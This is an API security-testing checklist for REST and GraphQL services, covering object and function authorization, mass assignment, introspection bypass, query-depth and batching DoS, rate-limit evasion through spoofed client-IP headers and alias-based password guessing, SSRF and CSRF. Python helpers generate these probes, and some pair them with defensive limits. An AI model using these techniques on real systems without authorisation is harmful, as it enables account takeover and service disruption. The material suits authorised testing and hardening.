Checklist.md

File metadata and controls

107 lines (57 loc) · 2.64 KB

REST API

Broken Object Level Authorization (BOLA)

  • Test parameter value manipulation (e.g., change id=1 to id=0 or to another user's id)

  • Test path value manipulation (e.g., /100/user to /101/user)
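The two BOLA probes above amount to one procedure: take a request that works for the legitimate owner, replay the same object path under another identity, and compare the responses. The following harness does that, as an added example that is not part of the original checklist. `fake_api`, the two accounts and the token names are constructed stand-ins for a vulnerable REST service; against a live target the same `check_bola` loop would wrap real HTTP calls.

```python
"""BOLA/IDOR check: replay a victim's object requests under another identity.

Added example, not part of the original checklist. `fake_api` is a constructed
in-memory stand-in for a vulnerable REST service; replace it with real HTTP
calls when testing a live target.
"""
import re

# Constructed sample data: two accounts, each owning one user record.
USERS = {
    100: {"id": 100, "owner": "alice", "email": "alice@example.test"},
    101: {"id": 101, "owner": "bob", "email": "bob@example.test"},
}
TOKENS = {"token-alice": "alice", "token-bob": "bob"}


def fake_api(token, path, enforce_ownership=False):
    """Simulate GET /user/<id>; returns (status, body).

    With enforce_ownership=False the handler checks only that the token is
    valid, not that the caller owns the object: the BOLA the checklist probes.
    """
    caller = TOKENS.get(token)
    if caller is None:
        return 401, {"error": "unauthenticated"}
    match = re.fullmatch(r"/user/(\d+)", path)
    if not match:
        return 404, {"error": "not found"}
    record = USERS.get(int(match.group(1)))
    if record is None:
        return 404, {"error": "not found"}
    if enforce_ownership and record["owner"] != caller:
        return 403, {"error": "forbidden"}
    return 200, record


def check_bola(attacker_token, victim_token, path_template, victim_ids,
               enforce_ownership=False):
    """Fetch each of the victim's objects as the victim (baseline), then replay
    the same path with the attacker's token.

    An id is reported as leaked when the attacker gets 200 with a body
    identical to the owner's; a 403/404 for the attacker means the object-level
    check held. Compare bodies, not just status codes: some APIs answer 200
    with an empty or redacted object.
    """
    leaked = []
    for obj_id in victim_ids:
        path = path_template.format(id=obj_id)
        base_status, base_body = fake_api(victim_token, path, enforce_ownership)
        if base_status != 200:
            continue  # owner cannot read it either, so there is no baseline
        att_status, att_body = fake_api(attacker_token, path, enforce_ownership)
        if att_status == 200 and att_body == base_body:
            leaked.append(obj_id)
    return leaked


if __name__ == "__main__":
    print("vulnerable:", check_bola("token-alice", "token-bob", "/user/{id}", [101]))
    print("hardened:  ", check_bola("token-alice", "token-bob", "/user/{id}", [101],
                                    enforce_ownership=True))
```

Collect `victim_ids` from the victim's own session first (listing endpoints, links in responses), so the attacker replay is only run against objects the attacker is not supposed to see.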

Mass Assignment

  • Test for "isadmin":"true"

  • Test for "isadmin": true

  • Test for "id": 1

  • Test for "user_role":"admin"

  • Test for "file_path":"../../../../index.php"

  • Test for "email-verify": true

  • Attempt to update a user's password without old password
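The probes in this section all exploit the same defect: the handler binds whatever keys arrive in the body onto the stored record. The example below, added here and not part of the original checklist, puts a vulnerable profile update next to an allow-listed one and runs the checklist's probes against both. The record layout and the field names `isadmin`, `user_role`, `email_verified` and `display_name` are constructed.

```python
"""Mass assignment: a vulnerable profile update beside an allow-listed one.

Added example, not part of the original checklist. The record layout and
field names (isadmin, user_role, email_verified, display_name) are constructed.
"""
import json

# Fields the profile endpoint is meant to let the user change.
ALLOWED_FIELDS = {"display_name", "email"}


def make_user():
    return {"id": 7, "email": "user@example.test", "display_name": "user",
            "isadmin": False, "user_role": "member", "email_verified": False}


def update_profile_vulnerable(user, body):
    """Binds every key in the JSON body straight onto the record."""
    user.update(json.loads(body))
    return user


def update_profile_hardened(user, body):
    """Binds only allow-listed keys; returns the keys it dropped so a test or
    log can show which protected fields a client tried to set."""
    data = json.loads(body)
    rejected = sorted(set(data) - ALLOWED_FIELDS)
    for key in ALLOWED_FIELDS & set(data):
        user[key] = data[key]
    return user, rejected


def is_admin(user):
    """Typical privilege check. The string "true" is truthy in Python, so both
    of the checklist's isadmin probes escalate against the vulnerable handler
    even though only one of them is a JSON boolean."""
    return bool(user["isadmin"])


# The checklist's probes as JSON bodies (constructed), paired with the
# server-controlled field each one targets.
PROBES = [
    ('{"isadmin":"true"}', "isadmin"),
    ('{"isadmin": true}', "isadmin"),
    ('{"id": 1}', "id"),
    ('{"user_role":"admin"}', "user_role"),
    ('{"email_verified": true}', "email_verified"),
]


def run_probes(update_fn):
    """Return the protected fields that `update_fn` let a probe overwrite."""
    changed = []
    for body, field in PROBES:
        user = make_user()
        before = user[field]
        result = update_fn(user, body)
        user = result[0] if isinstance(result, tuple) else result
        if user[field] != before:
            changed.append(field)
    return changed


if __name__ == "__main__":
    print("vulnerable overwrote:", run_probes(update_profile_vulnerable))
    print("hardened overwrote:  ", run_probes(update_profile_hardened))
```

When testing a real API, check the stored result with a follow-up GET (or by exercising the privilege), not the update response: some frameworks echo the request body back while silently ignoring unknown fields.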

Improper Assets Management

  • Test by changing the version in URL path (e.g., /api/v2/user to /api/v1/user)

  • Test by changing the version in request parameters (e.g., /api/product?ver=2)

  • Test by changing the version in request headers (e.g., Accept: application/json; version=2.0, or a dedicated version header)

Broken Function Level Authorization (BFLA)

  • Change path to access admin functionality (e.g., /user/10/delete to /admin/user/10/delete)

  • Attempt to view admin data (e.g., /user/view to /admin/view).

Other

  • Check for dangerous or unneeded HTTP methods (e.g., PUT/DELETE/TRACE); PUT and DELETE may allow writing or removing resources, TRACE enables cross-site tracing.

  • Remove the authorization token (or cookie) and test for unauthenticated access.

  • Test MIME type validation bypass (e.g., on uploads, change the Content-Type header or the file extension).

  • Use a wildcard as the object identifier (e.g., /user/* to list every user).

  • HTTP parameter pollution (e.g., id=1&id=2; front-end and back-end components may pick different copies).

GraphQL API

Information Disclosure

  • Test GraphQL introspection

  • Find GraphiQL endpoint

  • Test GraphQL interface protection bypass by changing the cookie value from env=graphiql:disable to env=graphiql:enable

  • Try to bypass introspection blocking by changing the request format, e.g., send the introspection query as a GET request or with Content-Type: application/x-www-form-urlencoded; filters often inspect only JSON POST bodies.

  • Use InQL Scanner (Burp extension) to find hidden queries and mutations.

Denial of Service (DoS)

  • Test deeply nested queries (the same relation followed many levels deep) to check for a query depth limit.

  • Test nested or circular fragments (fragments that spread each other) to check that fragment validation is enforced.

  • Test query batching (an array of operations in one request, or many aliases in one operation) to check for a per-operation rather than per-request limit.
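The three DoS probes above, together with the server-side limits that defeat them, as an added example that is not part of the original checklist. The field names `user`, `friends` and `id`, the `User` type and the fragment names are constructed; adapt them to the target schema.

```python
"""GraphQL resource-exhaustion probes and the server-side limits that stop them.

Added example, not part of the original checklist. The field names (user,
friends, id), the User type and the fragment names are constructed.
"""
import json


def nested_query(depth, relation="friends", leaf="id"):
    """Build a query that follows the same relation `depth` levels deep:
    query { user { friends { friends { ... { id } } } } }"""
    body = leaf
    for _ in range(depth):
        body = f"{relation} {{ {body} }}"
    return f"query {{ user {{ {body} }} }}"


def circular_fragments():
    """Two fragments that spread each other. The spec forbids cycles, but a
    server that skips fragment validation recurses until it runs out of stack."""
    return ("query { user { ...A } } "
            "fragment A on User { id ...B } "
            "fragment B on User { id ...A }")


def single_operation(query):
    """The usual POST body: one operation."""
    return json.dumps({"query": query})


def batched_operations(query, count):
    """Array batching: one HTTP request carrying `count` operations."""
    return json.dumps([{"query": query} for _ in range(count)])


def query_depth(query):
    """Selection-set depth measured by brace nesting. Adequate for the probe
    strings built here; a real server should walk the parsed AST, since a
    string argument may itself contain braces."""
    depth = current = 0
    for ch in query:
        if ch == "{":
            current += 1
            depth = max(depth, current)
        elif ch == "}":
            current -= 1
    return depth


def enforce_limits(payload, max_depth=10, max_batch=5):
    """Pre-check a hardened endpoint would run before executing anything.
    Returns (accepted, reason)."""
    body = json.loads(payload)
    operations = body if isinstance(body, list) else [body]
    if len(operations) > max_batch:
        return False, f"batch of {len(operations)} exceeds {max_batch}"
    for op in operations:
        depth = query_depth(op["query"])
        if depth > max_depth:
            return False, f"depth {depth} exceeds {max_depth}"
    return True, "ok"


if __name__ == "__main__":
    print(nested_query(3))
    print(enforce_limits(single_operation(nested_query(50))))
    print(enforce_limits(batched_operations(nested_query(1), 20)))
```

Start with a modest depth and increase it while timing the response; a server without a depth limit usually shows super-linear slowdown well before it errors out, and a cost or complexity limit is the more robust fix than depth alone.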

REST and GraphQL

Lack of Rate Limiting

  • GraphQL: use aliases to send many login attempts (one alias per candidate password) in a single request, so a per-request limit counts them as one.

  • Vary the spelling of the endpoint path (case, trailing slash, URL encoding) when the limit is keyed on the exact path.

  • Change the apparent client IP with request headers (the limiter may trust them):

    X-Forwarded-For: 127.0.0.1
    X-Originating-IP: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-Client-IP: 127.0.0.1
    X-Host: 127.0.0.1
    X-Forwarded-Host: 127.0.0.1

    Also send X-Forwarded-For twice (two separate X-Forwarded-For: 127.0.0.1 lines); the proxy and the limiter may read different copies.
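The three rate-limit bypasses above (alias batching, path spellings, spoofed client-IP headers including the repeated header), as an added example that is not part of the original checklist. The `login` mutation, its `token` field and the sample host are constructed; the request is serialised by hand because dict-based HTTP client libraries cannot send the same header twice.

```python
"""Rate-limit bypass probes: GraphQL alias batching, path variants, and
spoofed client-IP headers (including a repeated header).

Added example, not part of the original checklist. The `login` mutation, its
`token` field and the host name are constructed.
"""
import json

SPOOF_HEADERS = [
    "X-Forwarded-For", "X-Originating-IP", "X-Remote-IP", "X-Remote-Addr",
    "X-Client-IP", "X-Host", "X-Forwarded-Host",
]


def alias_login_query(username, passwords, mutation="login"):
    """One GraphQL document whose aliases each try a different password, so a
    per-request limit counts the whole batch as a single attempt."""
    attempts = [
        f"attempt{i}: {mutation}(username: {json.dumps(username)}, "
        f"password: {json.dumps(pw)}) {{ token }}"
        for i, pw in enumerate(passwords)
    ]
    return "mutation { " + " ".join(attempts) + " }"


def path_variants(path):
    """Spellings of the same endpoint that a per-path counter may key
    differently while the router still matches them."""
    head, _, last = path.rpartition("/")
    encoded_last = "%" + format(ord(last[0]), "02X") + last[1:]
    return [
        path,                              # as documented
        path + "/",                        # trailing slash
        head + "/" + last.capitalize(),    # case change
        head + "/" + encoded_last,         # percent-encoded first character
        head + "//" + last,                # doubled separator
    ]


def raw_request(method, path, host, body, extra_headers):
    """Serialize an HTTP/1.1 request by hand. Most client libraries keep
    headers in a dict and so cannot repeat a header; a raw socket can, which
    is what the duplicated X-Forwarded-For probe needs."""
    data = body.encode()
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}",
             "Content-Type: application/json", f"Content-Length: {len(data)}"]
    lines += [f"{name}: {value}" for name, value in extra_headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + data


def spoof_header_sets(ip="127.0.0.1"):
    """Each probe sets one spoof header; the last repeats X-Forwarded-For,
    which trips stacks where the proxy reads one copy and the limiter the other."""
    sets = [[(name, ip)] for name in SPOOF_HEADERS]
    sets.append([("X-Forwarded-For", ip), ("X-Forwarded-For", ip)])
    return sets


def count_header(raw, name):
    """Count occurrences of header `name` in a raw request (case-insensitive)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    return sum(1 for line in head.split("\r\n")[1:]
               if line.lower().startswith(name.lower() + ":"))


if __name__ == "__main__":
    query = alias_login_query("admin", ["password1", "Winter2024!", "admin"])
    for headers in spoof_header_sets():
        print(raw_request("POST", "/graphql", "api.example.test",
                          json.dumps({"query": query}), headers).decode())
```

Send each variant after the limit has been triggered and compare status codes and timing with the blocked baseline; a bypass that only works from 127.0.0.1 still matters, since the spoofed value is also what ends up in the access logs.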

Error Handling

  • Test error handling for field suggestions ("Did you mean ...?"); they leak field and type names even when introspection is disabled.

  • Test error handling for internal details (stack traces, file system paths, database errors) in error messages.

Server-Side Request Forgery (SSRF)

  • Test SSRF by manipulating the Referer header and including URLs.

  • Test SSRF by including full URLs in the POST body or parameters.

Cross-Site Request Forgery (CSRF)

  • Change the Content-Type: application/json header to Content-Type: application/x-www-form-urlencoded and check whether the endpoint still accepts the body. A form-encoded POST is a "simple" cross-origin request that browsers send without a CORS preflight, so if the API authenticates with cookies (rather than an Authorization header) the request is forgeable from an attacker's page.
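A small pre-check for the CSRF item above, added here and not part of the original checklist: it classifies a request the way a browser does (preflight or not) and performs the JSON-to-form re-encoding the item describes. The sample payload is constructed.

```python
"""CSRF pre-check for JSON APIs: would a browser preflight this request?

Added example, not part of the original checklist. A cross-origin request the
browser classes as "simple" is sent without an OPTIONS preflight and carries
cookies, so a cookie-authenticated endpoint that also accepts a form-encoded
body can be hit from an attacker's page. The sample payload is constructed.
"""
from urllib.parse import urlencode

SIMPLE_METHODS = {"GET", "HEAD", "POST"}
SIMPLE_CONTENT_TYPES = {"application/x-www-form-urlencoded",
                        "multipart/form-data", "text/plain"}
# Headers a browser lets a simple request carry without preflight.
SAFELISTED_HEADERS = {"accept", "accept-language", "content-language",
                      "content-type"}


def needs_preflight(method, headers):
    """Return True when a browser would preflight this cross-origin request.
    `headers` are the headers the page sets explicitly; cookies are attached
    by the browser and never count."""
    if method.upper() not in SIMPLE_METHODS:
        return True
    for name, value in headers.items():
        lname = name.lower()
        if lname not in SAFELISTED_HEADERS:
            return True  # e.g. Authorization or X-Requested-With
        if lname == "content-type":
            media_type = value.split(";", 1)[0].strip().lower()
            if media_type not in SIMPLE_CONTENT_TYPES:
                return True
    return False


def json_to_form(payload):
    """Re-encode a flat JSON object as a form body, the swap the checklist item
    describes. Nested objects cannot be expressed this way, and the bypass only
    works if the server's body parser accepts form fields for the same handler."""
    return urlencode({key: str(value) for key, value in payload.items()})


def csrf_candidate(method, headers, uses_cookie_auth):
    """A request is worth a CSRF proof of concept when it is authenticated by
    cookie and the browser would send it cross-origin without preflight."""
    return uses_cookie_auth and not needs_preflight(method, headers)


if __name__ == "__main__":
    json_headers = {"Content-Type": "application/json"}
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    print("JSON POST preflighted:", needs_preflight("POST", json_headers))
    print("form POST preflighted:", needs_preflight("POST", form_headers))
    print("form body:", json_to_form({"email": "attacker@example.test"}))
```

If the endpoint rejects the form body, the next thing to check is whether the server requires the Content-Type at all: some frameworks parse a JSON body regardless of the declared type, in which case a text/plain request built from an HTML form will reach the same handler.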